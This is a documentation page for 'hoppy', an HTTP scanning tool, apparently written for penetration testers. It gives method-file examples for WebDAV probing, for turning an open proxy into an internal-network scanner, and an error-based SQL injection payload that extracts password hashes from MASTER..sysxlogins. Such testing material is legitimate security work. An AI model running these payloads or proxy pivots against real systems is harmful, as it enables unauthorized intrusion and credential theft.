News - Main Page
Whitepapers
Tools and Download
Presentations
Related
:hoppy

example usage

In the archive the is a directory called example-methods, these are some other method files which can be used for specific tasks.

testing for webDAV

The default file methods file will check for webDAV on the specified directory, but this may not be enough. webDAV can be configured to only be enabled on certain directories, therefore ideally we need to check for webDAV on all of the directories on the server. To do this a loop file con be specified with -L command line switch. This will take all loop methods and run them on all of the lines in the loop file, which should contain the directories on the server. webDAV checking over the loop is contained within the default methods file but to only do webDAV checking the following line can be used:

  • webDav on (loop), PROPFIND (loop) HTTP/1.1\nhost: (host):(port)\n(auth)\nDepth: 1\nContent-Type: text/xml\nExpect: 100-continue\nContent-Length: 143\nTranslate: f\n\n(wait)\n \n \n\n\n \n\n \n\n

In this instance the loop parameter file contained, for example, the following;

  • /images
  • /tmp
  • /admin
  • /test

command line:

  • hoppy -h testserver -L loop -o example-methods/webdav

as a yxorp scanner

Having found ourselves facing a webserver on a test which appeared to work as a proxy we wanted a way to use this to enumerate the clients internal network. Enter hoppy. The following methods can be used to connect through a proxy server.

  • site (loop), GET http://(loop)/ HTTP/1.1\nHost: (loop)\n(auth)\n\n
  • Proxy Connect (loop), CONNECT (loop) HTTP/1.1\nHost: (loop)\n(auth)\n\n(wait)GET / HTTP/1.1\nHost: (loop)\n\n

In this instance the loop parameter file contained, for example, the following;

  • 192.168.0.1:80
  • 192.168.0.2:443
  • localhost:22

command line:

  • hoppy -h testserver -L loop -o example-methods/proxy
  • hoppy -h testserver -L loop -o example-methods/proxyconnect

data extraction

hoppy can be used to extract specific data from the server responce. For example while extracting data in a error based SQL injection. While hoppy may not be the best tool to use in this instance it is possible. To do this a new line needs to be added to response-keywords file. The second parameter of 1 indicates that we are in data extraction mode

  • nvarchar, 2

method;

  • SQL (loop), GET /login.asp?username=a&password='+and+1=(select+TOP+1+ master.dbo.fn_varbintohexstr(password)+%2b'B'+from+(select+TOP+(loop)+ password,name+from+MASTER..sysxlogins+ORDER+BY+name+ ASC)+ sqORDER+BY+name+DESC)-- HTTP/1.1\nHost: (host):(port)\n(auth)\n\n

 

 

 

Last Updated : 20/05/2008 10:38:31